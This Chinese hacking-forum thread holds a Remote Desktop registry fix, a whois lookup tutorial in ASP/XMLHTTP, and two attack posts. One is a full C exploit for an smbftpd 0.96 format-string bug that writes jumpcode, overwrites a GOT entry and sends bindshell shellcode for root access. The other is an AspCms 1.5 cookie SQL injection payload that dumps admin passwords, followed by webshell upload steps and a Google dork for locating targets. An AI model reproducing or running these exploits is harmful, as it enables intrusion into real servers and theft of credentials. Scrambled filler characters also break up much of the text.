返回列表 发帖

解决方法:远程计算机需要网络级别身份验证,而您的计算机不支持该验证

故障症状:当您使用Windows XP“远程桌面连接”工具去连接Windows Vistas或Windows Server 2008的远程桌面、终端服务时,出现上述故障。
& ?! z# _) }+ N7 Z- a# W2 @" d* Z故障产生环境:远程桌面连接工具6.0以下版本,或者Windows XP Profressional SP1、SP2、SP3, y' }6 K9 Y4 f$ H; f. v" `
解决方法:
, K$ e% L# V+ U) ?0 O* ^! Z5 U6 `6 U1、请升级“远程桌面连接”工具最新6.1版本。- z. ^3 T1 g; L# f+ z
2、请把XP升级到最新SP3补丁包。6 M* ?% I5 j* J: ^3 G4 ^6 I
3、运行“regedit”打开注册表编辑器,进入 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”,双击右边栏中的 “Security Packages”,打开“编辑多字符串”对话框,在列表框光标处增加“tspkg”字符。  
% P( V  O7 j! i' H, O3 Y* }; c4、然后定位到 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders”,双击右侧的“SecurityProviders”字符串,打开“编辑字符串”对话框,在数值末端中添加“, credssp.dll”,注意逗号后有一个英文的空格。  7 h" z: x5 }" O7 l1 k8 B
5、退出注册表程序,重启计算机后故障排除。
5 \3 h2 m$ q4 c8 Y: d, W: P, y重启系统后,然后再运行mstsc查看关于信息已经显示为支持网络级别身份验证了。
8 M, s8 ^) I; s- v0 u( v  h+ l
    有些文章写win2008/Vista不能用IP访问远程桌面,只能用机器名,是不对的。都是可以的。# @0 y2 \# p+ ^) U9 I

$ k9 K, z) C$ k9 m2 b& y知识点:什么是网络级身份验证?
) \. X3 p& M8 T1 e    网络级身份验证 (NLA) 是一种新的身份验证方法,在您建立所有远程桌面连接之前完成用户身份验证,
: b% t- |! o4 x; D1 j6 Y; v4 `  X并出现登录屏幕。 这是最安全的身份验证方法,有助于保护远程计算机避免黑客或恶意软件的攻击。NLA
/ j; O1 a$ D" T1 J; T' S的优点是:2 a* `' k( ]7 K$ I0 G( Z2 q
    最初需要较少的远程计算机资源。验证用户之前,远程计算机使用有限的资源,而不是像以前版本那样# Q+ L# d) ?% {7 k- y
启动所有远程桌面连接。
& Y2 y5 b+ E, k" e' C    它通过降低拒绝服务攻击的风险帮助提供更好的安全性。(拒绝服务攻击试图限制或阻止访问Internet。)& N! c0 _4 @3 E
    使用远程计算机身份验证,从而帮助防止用户连接到设置为恶意目的的远程计算机

 

您可能还想看的主题:

新手来论坛学习

美国发明了网络数字大炮,可摧毁整个互联网

花旗支付注入漏洞

计算机犯罪司法解释出台:提供程序工具属犯罪

黑客基地VIP教程1-104课下载<本人求个师傅!要免费的!》

免费数据恢复软件(OO DiskRecovery)下载v7.1.183汉化版

SQL注入是什么情况?

学什么都好,不要学人当黑客

Apache服务器安全防范

如何攻站

1

评分人数

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:haimimi008发表,本帖发表者haimimi008符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者haimimi008和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

smbftpd 0.96 远程格式化字符串 Exploit
/** smbftpd 0.96 Proof of concept* tested with smbftpd 0.96 compiled with gcc 3.3.6** 1. write jumpcode to `BSS`*      mov dx, 0x1234*      pop eax*      cmp ax, dx*      jne $-4*      jmp esp* 2. overwrite a GOT entry with the addr to `BSS` &amp; send shellcode**  jerry:~> ./bleh -h localhost*  [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791*  [+] localhost:21 (user: anonymous pass: )*  [+] PASV*  [+] writing jumpcode*  [+] PASV*  [+] overwriting GOT entry and sending shellcode*  jerry:~> nc localhost 4444*  id*  uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)***  - Jerry Illikainen <jerry@debork.se>**/#include <stdio.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#include <stdarg.h>#include <unistd.h>#include <stdlib.h>#define GOT 0x080591d8 // GOT entry for chdir#define BSS 0x0805a791 // this is where the jumpcode will be written#define DEBUG(d) if (debug) d;#define MAXPATH 255#define BUFSIZE 512unsigned int debug = 0;/* bindshell (port 4444) from metasploit.com* restricted chars = 0x00 0x0a 0x0d */unsigned char shellcode[] ="x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xa3""xefxd7xdbx83xebxfcxe2xf4x92x34x84x98xf0x85xd5xb1""xc5xb7x4ex52x42x22x57x4dxe0xbdxb1xb3xb2xb3xb1x88""x2ax0exbdxbdxfbxbfx86x8dx2ax0ex1ax5bx13x89x06x38""x6ex6fx85x89xf5xacx5ex3ax13x89x1ax5bx30x85xd5x82""x13xd0x1ax5bxeax96x2ex6bxa8xbdxbfxf4x8cx9cxbfxb3""x8cx8dxbexb5x2ax0cx85x88x2ax0ex1ax5b";void usage (char *arg){printf("%s [options]9 f7 Y$ R* K5 L5 Q* O
"   "         -h <host>
" {2 }2 G$ |' c3 _5 L  p"   "         -p <port>
1 p. s+ X9 G1 s/ Z, h/ _$ |7 g( }7 R"   "         -u <usernmae - default anonymous>. _2 e6 {1 `1 Q5 a2 d* [
"   "         -P <password - default none>
$ ]/ I4 m5 {) @( B9 K* C& a, `4 `4 `  Q
", arg);exit(1);}int sock (int port, char *host){struct hostent *h;struct sockaddr_in addr;int s;if ((h = gethostbyname(host)) == NULL){perror("[!] gethostbyname");exit(1);}if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){perror("[!] socket");exit(1);}addr.sin_family = AF_INET;addr.sin_port = htons(port);addr.sin_addr = *((struct in_addr *)h->h_addr);memset(addr.sin_zero, '', sizeof addr.sin_zero);if (connect(s, (struct sockaddr *)&amp;addr, sizeof(struct sockaddr)) == -1){perror("[!] connect");exit(1);}return s;}char *s_send (int s, char *m, char *fmt, ...){static char buf[BUFSIZE];char str[BUFSIZE];ssize_t nb;va_list ap;va_start(ap, fmt);vsnprintf(str, BUFSIZE-1, fmt, ap);va_end(ap);if (send(s, str, strlen(str), 0) == -1){perror("[!] send");exit(1);}DEBUG(printf("send: %s3 `  u1 l( f$ c
", str));for (;;){nb = recv(s, buf, BUFSIZE-1, 0);buf[nb-1] = '';if (m == NULL)return buf;else if (strstr(buf, m) != NULL)return buf;}}void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH]){unsigned char a[4], b[4];char *dir = mkd[0];unsigned int i, offset = 1052, start = 256, base = 4;int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];for (i = 0; i <= 4; i++){a[0] = (int)pa >> 24;a[1] = ((int)pa &amp; 0xff0000) >> 16;a[2] = ((int)pa &amp; 0xff00) >> 8;a[3] = (int)pa &amp; 0xff;b[0] = (int)pb >> 24;b[1] = ((int)pb &amp; 0xff0000) >> 16;b[2] = ((int)pb &amp; 0xff00) >> 8;b[3] = (int)pb &amp; 0xff;snprintf(dir, MAXPATH-1,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c""%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",a[3], a[2], a[1], a[0],a[3] + 1, a[2], a[1], a[0],a[3] + 2, a[2], a[1], a[0],a[3] + 3, a[2], a[1], a[0],b[3] - 12 + start - (base + 4 - (base%4)), offset,b[2] - b[3] + start, offset + 1,b[1] - b[2] + start, offset + 2,b[0] - b[1] + start, offset + 3);dir = mkd;if (i < 3){pa = (int *)jmpaddr;pb = (int *)jmpc;} else {pa = (int *)got;pb = (int *)jmpaddr[0];}}}int main (int argc, char **argv){int s[2], c, port = 21, pasv[5];unsigned int i;char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;char mkd[5][MAXPATH], sc[2048];int got = GOT,jmpaddr[] = { BSS, BSS+4, BSS+8 },jmpc[] = {0x1234ba66, // mov dx, 0x1234   - 66 ba 34 120xc2396658, // pop eax          - 580xe4fffa75  // cmp ax,dx        - 66 39 c2                        // jne $-4          - 75 fa                        // jmp esp          - ff e4};while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1){switch (c){case 'h':host = optarg;break;case 'p':port = atoi(optarg);break;case 'u':user = optarg;break;case 'P':pass = optarg;break;case '?':default:usage(argv[0]);break;}}if (host == NULL)usage(argv[0]);printf("[+] GOT: %p - .bss (jmpcode): %p. t9 [' \9 a+ O3 v" O, T5 q2 `: y
", (void *)got, (void *)jmpaddr[0]);fmt(jmpaddr, jmpc, got, mkd);printf("[+] %s:%d (user: %s pass: %s)
5 c9 i% x7 U7 l! W$ E+ g8 E", host, port, user, pass);s[0] = sock(port, host);s_send(s[0], "331", "USER %s( L: t, `# v7 b/ |& ^4 I9 {3 _
", user);p = s_send(s[0], NULL, "PASS %s# b( I; j  h' F( q: t4 h! e
", pass);if (strstr(p, "230") == NULL){printf("[!] login failed/ q- K: c2 L9 J6 I- c. x, [& o
");exit(1);}p = s_send(s[0], NULL, "MKD %s
. P. M8 R& c' T* r; cMKD %s* e8 R! E; H' V$ Z1 `  B
MKD %s
! a( }4 e! E1 h. B. q", mkd[0], mkd[1], mkd[2]);if (strstr(p, "257") == NULL){printf("[!] couldn't make directories
& d; m" q: [* x, q");exit(1);}printf("[+] PASV
. L& o/ f. j9 y% U");p = s_send(s[0], "227", "PASV
1 S+ q, T# f, `- c, x. P) i");if (strtok(p, ",") == NULL)exit(1);for (i = 0; i < 5; i++){if ((tmp = strtok(NULL, ",")) == NULL){printf("[!] aborting
0 D( c0 j2 H4 ]5 ~! V( i");exit(1);}pasv = atoi(tmp);}s[1] = sock(pasv[3]*256+pasv[4], host);printf("[+] writing jumpcode, y: Y5 W! ~5 s7 J
");s_send(s[0], NULL, "NLST -R% U; S: R) B5 J, Q2 c
");s_send(s[0], NULL, "RMD %s' [& y3 H7 a2 i; y3 t0 x! j) z
RMD %s! E9 E# G! K1 W; Z. P! c
RMD %s
( c$ B! w& k5 j7 T", mkd[0], mkd[1], mkd[2]);close(s[1]);s_send(s[0], NULL, "MKD %s! f* ~9 c* x( t$ x! i# x$ E
", mkd[3]);printf("[+] PASV
, ]9 p* p% c2 z) |9 I");p = s_send(s[0], "227", "PASV. t' h- N. ?6 v& S4 q1 @7 p3 e
");if (strtok(p, ",") == NULL)exit(1);for (i = 0; i < 5; i++){if ((tmp = strtok(NULL, ",")) == NULL){printf("[!] aborting$ l) c) Y# D# T4 K# J
");exit(1);}pasv = atoi(tmp);}s[1] = sock(pasv[3]*256+pasv[4], host);memset(sc, 0x90, sizeof(sc)); // some nops before andmemcpy(sc+3, "x34x12", 2); // after the "mark"memcpy(sc+12, shellcode, sizeof(sc)-12);printf("[+] overwriting GOT entry and sending shellcode. p& B: V, r9 B: F0 ]* u
; b$ }9 o) r, |2 [4 s
");s_send(s[0], NULL, "NLST -R%s
' U8 \- l7 z  G! |", sc);return 0;}
7 B% ]% V& x# x. R
4 J% ~3 T2 u2 R; W9 Q
, b& `! g8 [- {4 }# _# l- V! x9 h; Q) H, g- v0 |

8 d0 ]: D3 D* f2 \8 y, p! T8 U
" X: A7 O6 W- k, v
' b3 V7 N* ^/ V, q- ^7 {- C, |/ U
, U9 m, z$ v% h& f  B, T  l( d4 k" u) v

; v3 C/ R8 S2 z5 R4 C
! L- m) f2 I( N# N9 x" u# L4 W* T  o! T3 `8 _1 P3 M" k+ q3 a+ z* F
$ }- P$ x8 N4 N5 _
4 \& e2 R% t; b: z4 U+ m

2 j. K# D2 N4 N7 K" D% E% t/ S' w$ M& e% b4 z
$ n: j- d) d8 Q- M

9 m8 g. m  n$ ]& G2 p( k  W3 b5 c. J( s7 {  \- x& M$ X" n- }
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

使用xmlhttp为网站增加域名查询功能
当我们准备建立一个Web站点时,就必须向域名登记机构申请一个Internet域名,因此,我们通常希望了解自己准备使用的域名是否已经被注册,这时,可以访问NIC站点http://www.nic.net,点击"whois"链接后输入需查询的域名,就可以得到我们需要的结果。

4 A- G0 U3 {  u: y) f* J

+ S* `0 d( S: t, Z" |$ f
WHOIS服务器为 .com、.net 和 .org 的国际顶级域名的查询返回全部的 whois 数据,包括网站域名注册人、管理合约、联系方式(电话、电子邮件、地址)、帐单联络、技术支持和域名服务器信息,对于用户了解一个网站的基本情况很有帮助。在很多域名注册服务商的网站中,通常都有whois(域名查询)的高级服务,但个人网站因为不具备域名注册服务商的资格和数据,所以在一般条件下无法提供whois服务。 Chinaz.com

) c4 V% P8 R0 e
其实,利用XMLHTTP协议,我们每个人都可以在自己的个人网站中提供域名详细情况查询(WHOIS)服务,本文介绍了如何使用ASP结合xmlhttp编程来实现这个功能。  
9 Y/ k, q- ^* R, ]9 L
一、原理:  
  {% z$ X5 i! _& f' D" j8 I
原理非常简单,域名的查询主要是基于RFC 954提供的WHOIS协议。在实现过程中,我们通过自己的WEB服务器访问NIC站点的WHOIS数据库服务器,从WHOIS数据库中查询我们所需要的内容,然后通过ASP组合成网页回送给客户端。  

, D  B# \% \; u$ V% u- L/ \0 D! S; m) x
同时,我们使用xmlHttp协议实现客户端网页无刷新效果以及向服务端提出检索WHOIS数据的要求。  
; A* f& W9 G& c6 K5 O/ ^# \
具体流程为:客户端通过xmlhttp提出域名查询要求-->WEB服务器中的ASP侦听页接受请求后使用xmlhttp向WHOIS服务器发送检索命令-->WHOIS数据库执行查询操作,返回结果给我们自己的WEB服务器(html形式)-->WEB服务器接收到内容后,立即将结果传送给客户端->客户端浏览器使用vbscript过滤掉HTML多余部分,挑选出whois数据显示出来。

% |2 d: h: A& V& `* t) T% W9 N

" L0 V, W& s. }+ v) V
二、ASP XmlHttp编程简述:  
! e% Y& Y9 x& I
1、客户端html页面:

1 F( {* E# c- i( E
5 o7 K/ q; `5 J. W; [6 b- j
以下为引用的内容:<script language="vbscript"> Sub submit1_onmouseup '当点击“查询”按钮时触发;  Dim objXML, objXSL, objFSO,strFile, strFileName, strXSL,strURL,TheForm  Set TheForm = Document.wordfind  window.status="正在检索数据···"  strURL="dns.asp"  Set objXML = CreateObject("Microsoft.XMLHTTP") '创建MS的XMLHTTP组件;  stra = "submit=submit&amp;fqdn="&amp;TheForm.words.value  objXML.Open "post",strURL,false '采用Post提交方式;  objXML.setrequestheader "content-length",len(stra) Www~Chinaz~com
7 [" ?% D6 S& j: \1 f
  objXML.setrequestheader "content-type","application/x-www-form-urlencoded"  objXML.send stra ' 发送信息  xmlGet = objXML.responseText '稍等片刻后,得到服务器端传回来的结果;  if instr(1,xmlGet,"This is not a valid .com .net .org .info or .biz domain  name",1)<1 and len(trim(xmlGet))>100 then    if instr(1,xmlGet,"This domain is available",1)<1 then     if instr(1,xmlGet,"Registrant:",1) then      strFind1 =instr(1,xmlGet,"Registrant:",1)    else      strFind1 = instr(1,xmlGet,"<pre><FONT face=""Verdana, Arial",1)+65

! I7 x6 S# y9 _+ C  r9 ]! W( H
strFind2 = instr(1,xmlGet,"</FONT></pre>",1)     strFind4=strFind2-strFind1     sHTML = mid(xmlGet,strFind1,strFind4)     TheForm.comments.value="查询结果:"+chr(13)+chr(10)+sHTML     window.status="查询结果:该域名已被占用"   else    TheForm.comments.value="恭喜你,此域名可用!" Www^     window.status="查询结果:该域名仍然处于可用状态!"    end if  else   TheForm.comments.value= "无效的国际顶级域名!请输入以(.com .net .org .info or .biz)结尾的国际域名, 例如sun.com"   window.status="无效的国际顶级域名!请输入以(.com .net .org .info or .biz)结尾的国际域名, 例如CCTV.com"  end if  Set objXML = Nothing end sub </script>

' J4 O& K1 t* j% N& N4 @9 x) _4 _
<html><head><title>XMLHTTP之域名查询篇</title></head><body bgColor=#cccca3><form method="post" name=wordfind onsubmit="javascript:return false">请输入域名名称:<input type="text" value="cctv.com" name="words" size="69"><input type="submit" value="查询" id=Submit1 name=Submit1><TEXTAREA name=comments readonly rows=10 cols=76></TEXTAREA></form></body></html>  
% a/ \  p- p* K% ~8 k
2、服务器端ASP程序: Chinaz.com
4 M9 m' j' a7 ]
以下为引用的内容:<%dim xmlGet,objXML, objXSL, objFSO,strFile, strFileName, strXSL,strURL xmlGet="" if len(trim(Request.form("fqdn"))) > 1 then  strURL="http://www.domainbank.net/whoisresults_gen.cfm?show=1"   'WhoIS服务器的地址  Set objXML = CreateObject("Microsoft.XMLHTTP") '创建MS的XMLHTTP组件

) u" g- {( T2 g
  stra = "submit=submit&amp;fqdn="&amp;trim(Request.form("fqdn"))  objXML.Open "post",strURL,false  objXML.setrequestheader "content-length",len(stra)  objXML.setrequestheader "content-type","application/x-www-form-urlencoded" Chinaz   objXML.send stra ' 发送信息到WhoIs数据库服务器;

& F3 ]  Q% o- z8 h: X7 }! y
  xmlGet = objXML.responseText ' 取得域名服务器返回的信息  Set objXML = Nothing end if response.write xmlGet '返回结果给客户端%>  

! `4 I6 a* ~0 z# ]! q$ k
在上述过程中,可以发现我们自己的WEB服务器中的ASP程序其实只起到一个中间传递的作用,在实际应用中,也可以省去这个中间层,使用vbscript通过xmlhttp直接向WHOIS数据库发送和接收数据。不过这样的话,可能会因为IE中“通过(其它)域访问数据资源”被禁用(默认)而引起权限不够导致无法执行,所以该省去ASP中间层的方法并不太通用。

4 Z) `* y/ J+ n, C- }
# D" s+ N% G- h! L  s
本程序在基于Windows2000平台的IIS5.0和IE6.0上运行通过。实际使用过程中,可以把上述代码拷贝到自己网页中,经过简单的页面编辑,就可在自己的网页中增加在页面无刷新情况下的域名查询功能了,初看上去,还真的有点象专业的域名注册服务商网站提供的服务了。
1 y$ K+ S- m5 f5 v

7 X$ `8 P& ~) |- A* l
) w+ q! ?0 n! f/ ?8 D' H  `5 D
# J% Z& E' D) x) w) \6 n, ~& f; W' w5 q/ y& d! d3 B# w
! b* j: }8 e4 U9 I- i
1 d, j# I  B$ o5 V( W" `
2 {- b4 U( l7 H0 v  S

9 B! t9 m# u" O5 l
7 Y8 z1 P1 t! X3 D- C! @( X& O/ v: L8 s' _& V( F- j6 i

1 V1 O& k5 z7 Q* R3 F6 [) @
; |; T% j2 i1 E) ?3 G. ~$ c$ j; L4 a) J

0 T! \( n2 M& F/ {/ p) k: O" J1 ]& h3 P& ^
. L3 L. @0 z: |4 l

6 P; t4 f7 E2 x: `" d* J/ e% p5 Q2 [2 x) E& @1 \

7 y" Q- ]/ d+ `4 w公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Aspcms 稳定版1.5 0day
Author: Virushack

6 U7 @- s$ Y# x2 I
Blog: http://virushack.org

- l2 n- F) S; W/ ^5 S0 d
From:www.v5script.org
3 L1 o" T, G4 |& I" N, n+ h
漏洞文件:editpass.asp
: c$ t1 Z# m! N6 X, p" g
漏洞代码:

$ r9 t" I# q* Z  p/ ]: c; s! |' P- X
Dim   linkman  ,  gender  ,  phone  ,  mobile  ,  email  ,  qq  ,  address  , postcode
/ L' x0 `0 e$ |) T2 Qif   isnul  (  rCookie  (  "loginstatus"   ))   then   wCookie  "loginstatus"   ,  0
1 l6 k$ \/ g% @" G0 tif   rCookie  (  "loginstatus"   )=  1     then  6 O5 H  T7 H! X- E
set   rsObj  =  conn  .  Exec   (  "select * from aspcms_Users where UserID=" &amp; trim  (  rCookie  (  "userID"  )),  "r1" )  
* H" G; J5 b1 Z* h2 m8 v直接通过rCookie 取得userid带入查询.
, G- M' z. P) ^1 n. B+ u再看看 rcookie函数的处理
  b; K2 J2 T+ z, d( |: f! R
'读cookies , t' m0 r) H1 i
Function rCookie(cookieName) 3 w2 p5 Z0 Q+ O; _5 ]
rCookie=request.cookies(cookieName) 2 W' J6 ?) m$ z  y1 l
End Function
6 n/ [1 g% a( Q8 Q" g- N直接通过cookies取得

3 V; k0 e% s% J7 c2 S/ x1 W
利用:
& z3 d6 i" {$ t$ o9 {" {5 b/ d8 d. j7 s1.注册个帐号让 loginstatus不为空
6 m" T6 d. B$ q' q- _6 H2.cookies注入 userID(不管你手注还是工具都行 推荐用火狐的cookies插件)
5 a# L! J5 |$ r5 {
Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
4 l  O& J# Z% \6 j: l) Z
后台拿shell 就更简单了  插一句话什么都行  我这就用最稳当的方法
+ `( `  L7 x) X  [, k/ ?
http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp

- o% U2 h- [7 y
http://127.0.0.1/Templates/default/html/a.asp

7 f) o8 h' M3 {
Google Dork: Powered by AspCms v1.5
0 i2 U) z2 H; a2 ^3 T' v# o$ L+ ^
5 ~' q% T% t' ~! I

0 Z: b$ ^. p! Y0 p! l5 b/ ^1 u  F: ?/ i; A
% M2 d, Z5 x! V2 ^0 D9 L

& z8 a: H" b4 u7 ^" H8 Z% V! m% G" z9 O4 y: N- M) g" z

9 D8 E& t6 M2 u; G5 m; J+ z) w/ Y! s$ l! v4 [. R
2 Y  Q/ y0 C4 c* o

0 {. S; H3 D1 D- m3 P; j* M2 U
  G2 z  u) k2 H' X" I, i0 B* z; B3 q* ?5 k( q- X) T9 a

' \, J/ _+ Q+ X. E* P3 U& K' G
' C7 O% S/ n) m  ^4 P: k% o
$ Y) W- A, o$ K. }5 z% ?6 [5 P; s1 T6 n

0 O0 _3 O/ b- V
- E5 u$ I5 c$ e* D! n公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表